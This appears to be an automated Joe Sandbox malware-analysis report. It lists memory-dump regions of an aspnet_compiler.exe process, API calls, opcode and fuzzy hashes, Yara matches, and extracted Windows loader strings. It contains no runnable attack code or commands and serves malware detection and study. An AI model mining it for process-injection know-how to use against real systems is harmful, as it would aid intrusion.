                                                              control_flow_graph 65 1a22df0-1a22dfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 21bb61c977423f28b57d38df5f8ecee73aa843a39a6c09372a5c6651e193abef
                                                              • Instruction ID: d40e5ee7e6567211ce72c3aa3f8f2c7671f41eb231b616248e0bec625adc96e5
                                                              • Opcode Fuzzy Hash: 21bb61c977423f28b57d38df5f8ecee73aa843a39a6c09372a5c6651e193abef
                                                              • Instruction Fuzzy Hash: 4090023160140413D11171584504707001997D0241F96C512B0428558DD65A8A53B221

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 64 1a22c70-1a22c7c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
                                                              • Instruction ID: a7af68e280d3668a7584b7941adeffe58d976fd3bf3b5a4b0198f80521615792
                                                              • Opcode Fuzzy Hash: 54e6a49b9fb8295bc3ede5f177b96a627e0237f8f84ef550913c0cdd58d93062
                                                              • Instruction Fuzzy Hash: 1690023160148802D1107158840474A001597D0301F5AC511B4428658DC69989927221

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 66 1a235c0-1a235cc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c88c50a147dddc3356928fa356b09f91dce17060a49262e883d9acd556692805
                                                              • Instruction ID: 4edfbe1804ddd4bce89d2e671a3b0c2bd784bc7093c74cd41477dff196d881e5
                                                              • Opcode Fuzzy Hash: c88c50a147dddc3356928fa356b09f91dce17060a49262e883d9acd556692805
                                                              • Instruction Fuzzy Hash: 58900231A0550402D10071584514706101597D0201F66C511B0428568DC7998A5276A2

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 44 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                              • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                              • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                              • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 39 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                              • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                              • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                              • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 54 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                              • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                              • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                              • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 59 1a22c0a-1a22c0f 60 1a22c11-1a22c18 59->60 61 1a22c1f-1a22c26 LdrInitializeThunk 59->61
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
                                                              • Instruction ID: bea7e14b897860535c0148af998dd2fca7d218b9228ed5d5213523b5794349a9
                                                              • Opcode Fuzzy Hash: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
                                                              • Instruction Fuzzy Hash: 15B09B71D015D5C5DA11E7644608717791077D0701F16C172F2034741F473CC5D1F275
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
                                                              • Instruction ID: 5488dde0dd373dcc2350bfb6eab631f7460f30a87ffdc8dc7293d06694eeb1b9
                                                              • Opcode Fuzzy Hash: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
                                                              • Instruction Fuzzy Hash: CE927E71604742ABE721DF28C880B6BBBE8FF84750F04492EFA99D7251D774E845CB92
                                                              Strings
                                                              • Critical section address., xrefs: 01A55502
                                                              • Invalid debug info address of this critical section, xrefs: 01A554B6
                                                              • Critical section debug info address, xrefs: 01A5541F, 01A5552E
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A554CE
                                                              • Address of the debug info found in the active list., xrefs: 01A554AE, 01A554FA
                                                              • Critical section address, xrefs: 01A55425, 01A554BC, 01A55534
                                                              • Thread identifier, xrefs: 01A5553A
                                                              • double initialized or corrupted critical section, xrefs: 01A55508
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A5540A, 01A55496, 01A55519
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01A55543
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A554E2
                                                              • corrupted critical section, xrefs: 01A554C2
                                                              • undeleted critical section in freed memory, xrefs: 01A5542B
                                                              • 8, xrefs: 01A552E3
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 66a0c1c0065a06ce8f9ed200fdebc7fc46cf94a1186b270c9e203834d0b2007b
                                                              • Instruction ID: 227fd295461faea784efb12e8661b9a8a5dd07abf92621ed53e84936700a2b4b
                                                              • Opcode Fuzzy Hash: 66a0c1c0065a06ce8f9ed200fdebc7fc46cf94a1186b270c9e203834d0b2007b
                                                              • Instruction Fuzzy Hash: 7081BBB0E40358EFEB60CF99C845BAEBBB5BB88B14F14411DF949B7241D3B5A941CB60
                                                              Strings
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A52602
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A524C0
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A52624
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A5261F
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A52498
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A52506
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A52412
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A525EB
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A522E4
                                                              • @, xrefs: 01A5259B
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A52409
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: 77da295c228e65c52c9b16a71bac2113a08004c1c88b814f1402846f226d8850
                                                              • Instruction ID: da6fac63fb637f51d106756b1187bfda2f4d7a1d6adcab19e52b2536960bd5f1
                                                              • Opcode Fuzzy Hash: 77da295c228e65c52c9b16a71bac2113a08004c1c88b814f1402846f226d8850
                                                              • Instruction Fuzzy Hash: 3B0280B1D042299FDB71DB54CD80BAAB7B8AB54704F0441EAEB4DA7241D7309F84CF59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 65652daa801727dbaa238a80ab06e7a22975cb40c6f9377eecf03d75ba35a757
                                                              • Instruction ID: e36a34a5b26668fa0687bf05ed26217ad6383db07c233dd370450b9d5377baed
                                                              • Opcode Fuzzy Hash: 65652daa801727dbaa238a80ab06e7a22975cb40c6f9377eecf03d75ba35a757
                                                              • Instruction Fuzzy Hash: F651CFB15043119BC329EF588984BABBBE8BFD4640F544A1DE999C3284EB78D608C792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: fd4b03bea6f12c555504323a941ede1ed1b2f877fede28cb9437b686fb125e11
                                                              • Instruction ID: 8eb5a69ca958fc798c00623859a46e8128e9d8d264401c7e229700c5cc15fe8b
                                                              • Opcode Fuzzy Hash: fd4b03bea6f12c555504323a941ede1ed1b2f877fede28cb9437b686fb125e11
                                                              • Instruction Fuzzy Hash: 8BD1FD35600682DFDF22DF68C640AAEBBF5FF8A754F098059F58A9B612C7349981CB50
                                                              Strings
                                                              • VerifierDebug, xrefs: 01A68CA5
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A68A3D
                                                              • HandleTraces, xrefs: 01A68C8F
                                                              • VerifierFlags, xrefs: 01A68C50
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A68A67
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01A68B8F
                                                              • VerifierDlls, xrefs: 01A68CBD
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: 432d43952d58086e444899b78d5a6e2c44f60efcea768fed9bc083fe55296cad
                                                              • Instruction ID: 4a500150ea19c79cf5e6064c808bc20b0bf33754a497a450af6d516795e94025
                                                              • Opcode Fuzzy Hash: 432d43952d58086e444899b78d5a6e2c44f60efcea768fed9bc083fe55296cad
                                                              • Instruction Fuzzy Hash: 44911472A42B12EFD721DF68C990B6B77BCABA4B14F05441CFA466B244C738DC05CBA1
                                                              Strings
                                                              • ***Exception thrown within loader***, xrefs: 01A64E27
                                                              • Execute '.cxr %p' to dump context, xrefs: 01A64EB1
                                                              • minkernel\ntdll\ldrutil.c, xrefs: 01A64E06
                                                              • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01A64E38
                                                              • LdrpProtectedCopyMemory, xrefs: 01A64DF4
                                                              • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01A64DF5
                                                              • LdrpGenericExceptionFilter, xrefs: 01A64DFC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-2973941816
                                                              • Opcode ID: 1f644add543dd26cf199906372769a9ff970d5437862bc38ca874f548a622b45
                                                              • Instruction ID: 69c41b3d44dde858e2270f426c9218cb48388f2ab9532382c373942872447bfc
                                                              • Opcode Fuzzy Hash: 1f644add543dd26cf199906372769a9ff970d5437862bc38ca874f548a622b45
                                                              • Instruction Fuzzy Hash: 7E21ADF71882017FE72CAB6C8E45EB67BADFFC9D60F144109F25697581C560DE21C222
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: cd2c13f0421cb966b81b100be4bd3ebb7b8da466882f609be0196cf7c1e03503
                                                              • Instruction ID: aa913948ee71f3e861112b51be12079256ed5292b08972df1bccfc55cdc00671
                                                              • Opcode Fuzzy Hash: cd2c13f0421cb966b81b100be4bd3ebb7b8da466882f609be0196cf7c1e03503
                                                              • Instruction Fuzzy Hash: 5CA24C74A0562A8FDF65DF18CD88BA9BBB5BF89304F1442EAD50DA7251DB319E81CF00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: 92257a3334aa6f6b7b64f9a68e1482a114d0c7a4078f9320c19ae47969bdf910
                                                              • Instruction ID: fbb561acad7e0c04580e4aa7700920de2b8a14b9356e07820a8e2f4c0e7c70ad
                                                              • Opcode Fuzzy Hash: 92257a3334aa6f6b7b64f9a68e1482a114d0c7a4078f9320c19ae47969bdf910
                                                              • Instruction Fuzzy Hash: D1919E70F45B219BEB35DF18DA44BAE7BB1BF44B24F04001CED09AB285E7B49842C791
                                                              Strings
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A399ED
                                                              • apphelp.dll, xrefs: 019D6496
                                                              • LdrpInitShimEngine, xrefs: 01A399F4, 01A39A07, 01A39A30
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A39A01
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A39A2A
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A39A11, 01A39A3A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 619dbcb3a93719e13601e3cbb2b304956939497816a4fb0f444453c748289899
                                                              • Instruction ID: f2228455e43fcc2eed35c4cb335780d23467c01e3ac83c3ad95e12d098b42005
                                                              • Opcode Fuzzy Hash: 619dbcb3a93719e13601e3cbb2b304956939497816a4fb0f444453c748289899
                                                              • Instruction Fuzzy Hash: 0551B0716087059FE720DF28D881BAB77E8FBC4B48F40491DF58A97190D670E946CB93
                                                              Strings
                                                              • LdrpInitializeProcess, xrefs: 01A1C6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01A58181, 01A581F5
                                                              • LdrpInitializeImportRedirection, xrefs: 01A58177, 01A581EB
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A581E5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A1C6C3
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01A58170
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: caa5495ec603b57c4ff663ed049d162972cf01058de6106ea6c6ee1aa0b61e87
                                                              • Instruction ID: e47b2ac19dc9cfccf45242b0bc1368970d0d13c7c7cf1ae3f299a1fb69eb6f65
                                                              • Opcode Fuzzy Hash: caa5495ec603b57c4ff663ed049d162972cf01058de6106ea6c6ee1aa0b61e87
                                                              • Instruction Fuzzy Hash: 6B31F5716487469BC324EF29DA45E2A77A4FFD4B20F04091CF9856B295E630ED05C7A2
                                                              Strings
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01A52160, 01A5219A, 01A521BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A5219F
                                                              • SXS: %s() passed the empty activation context, xrefs: 01A52165
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A521BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A52178
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A52180
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: e1fca1835659294312a602a7e93f3fda59838a4942e5d8df27b1ae32731daece
                                                              • Instruction ID: 1c0ea0c1bc0cf1ec5350b619c55840b7420858f08b9a55c38cbcc84029787263
                                                              • Opcode Fuzzy Hash: e1fca1835659294312a602a7e93f3fda59838a4942e5d8df27b1ae32731daece
                                                              • Instruction Fuzzy Hash: DE31E936B40315BBE7259ADA9C81F6B7B78EB94E50F19005EFB087B144D270DA00CBA2
                                                              APIs
                                                                • Part of subcall function 01A22DF0: LdrInitializeThunk.NTDLL ref: 01A22DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20D74
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: 00a5918febedd15e664ff63720fc0686aec9e4443951062978a3fb370a944b1d
                                                              • Instruction ID: d03b597e291d750fcfef4bd4b168861dd05499f8cae41e27290fd1e590eb2535
                                                              • Opcode Fuzzy Hash: 00a5918febedd15e664ff63720fc0686aec9e4443951062978a3fb370a944b1d
                                                              • Instruction Fuzzy Hash: 3E426B71900715DFDB61CF28C980BAAB7F5FF04314F1445AAE999EB241E770AA85CF60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              Strings
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A1855E
                                                              • LdrpInitializeProcess, xrefs: 01A18422
                                                              • @, xrefs: 01A18591
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A18421
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              Strings
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A521D9, 01A522B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 01A521DE
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A522B6
                                                              • .Local, xrefs: 01A128D8
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              Strings
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A5342A
                                                              • RtlDeactivateActivationContext, xrefs: 01A53425, 01A53432, 01A53451
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A53456
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A53437
